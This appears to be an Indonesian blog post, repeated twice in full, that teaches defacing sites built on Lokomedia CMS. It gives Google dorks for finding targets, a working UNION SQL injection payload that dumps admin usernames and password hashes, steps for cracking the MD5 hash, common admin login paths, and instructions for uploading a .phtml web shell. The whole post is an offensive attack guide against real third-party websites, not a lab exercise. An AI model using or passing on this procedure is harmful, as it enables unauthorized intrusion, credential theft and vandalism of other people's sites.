Tutorial Deface dengan SQL Lokomedia
Kali ini saya akan ngebahas salah Satu Bug/Celah yg ada pada CMS Lokomedia.
Langsung aja Tutorial SQL Injection on Lokomedia CMS .
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
(kembangin lagi dorknya biar dapat yang Vuln dan Verawan)
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1. Dorking menggunakan Search Engine
2. Pilih web target, Lalu masukan Exploitnya.
Contoh targetnya seperti ini : target.com/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian tekan ctrl+u untuk melihatnya lebih jelas.
Terlihat User :
Contoh ni ya : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalian bisa gunakan web atau aplikasi lain untuk ngeDecrypt MD5 ini.
Untuk login biasanya di :
- www.target.com/admin
- www.target.com/adminweb
- www.target.com/administrator
- www.target.com/redaktur
Kali ini loginnya berada di target.com/adminweb/, Kemudian masukan user dan passwordnya di form.
Terus upload Shell dah, kalo dah sukses upload Shell, lu mau bedah ampe usus nya jg gk pp :D
Oh iya gw lupa, Untuk mengakses Shellnya biasanya di target.com/files/namashellLu
*Shell harus berekstensi .phtml *atau coba bypass ekstensi ke yang lain :3
Mudahkan, jangan lupa nitip ./Manz404
Dork : - inurl:kategori-23-hiburan.html
Baca Juga
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
(kembangin lagi dorknya biar dapat yang Vuln dan Verawan)
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1. Dorking menggunakan Search Engine
2. Pilih web target, Lalu masukan Exploitnya.
Contoh targetnya seperti ini : target.com/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian tekan ctrl+u untuk melihatnya lebih jelas.
Terlihat User :
Contoh ni ya : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalian bisa gunakan web atau aplikasi lain untuk ngeDecrypt MD5 ini.
Untuk login biasanya di :
- www.target.com/admin
- www.target.com/adminweb
- www.target.com/administrator
- www.target.com/redaktur
Kali ini loginnya berada di target.com/adminweb/, Kemudian masukan user dan passwordnya di form.
Terus upload Shell dah, kalo dah sukses upload Shell, lu mau bedah ampe usus nya jg gk pp :D
Oh iya gw lupa, Untuk mengakses Shellnya biasanya di target.com/files/namashellLu
*Shell harus berekstensi .phtml *atau coba bypass ekstensi ke yang lain :3
Mudahkan, jangan lupa nitip ./Manz404
Belum ada Komentar untuk "Tutorial Deface dengan SQL Lokomedia"
Posting Komentar